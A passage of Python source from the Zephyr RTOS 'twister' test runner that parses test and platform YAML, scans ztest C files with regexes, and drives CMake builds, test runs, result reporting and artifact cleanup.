self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestCase.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main)
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
stc_regex = re.compile(
br"""^\s* # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcse
\(\s*(?P<stc_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
registered_suite_regex_match = registered_suite_regex.search(
main_c)
if registered_suite_regex_match:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if not suite_regex_match and not has_registered_test_suites:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return ScanPathResult(
matches=None,
warnings=None,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main)
suite_run_match = suite_run_regex.search(main_c)
if suite_regex_match and not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
if suite_regex_match:
search_start = suite_regex_match.end()
else:
search_start = registered_suite_regex_match.end()
if suite_run_match:
search_end = suite_run_match.start()
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(main_c, search_start) \
.end()
achtung_matches = re.findall(
achtung_regex,
main_c[search_start:search_end])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[search_start:search_end])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return ScanPathResult(
matches=matches,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main)
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
self.instance.fill_results_by_status()
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total - results.skipped_configs
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done) / total_to_do) * 100)
skipped = results.skipped_configs + results.skipped_runtime
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if skipped > 0 else Fore.RESET,
skipped,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
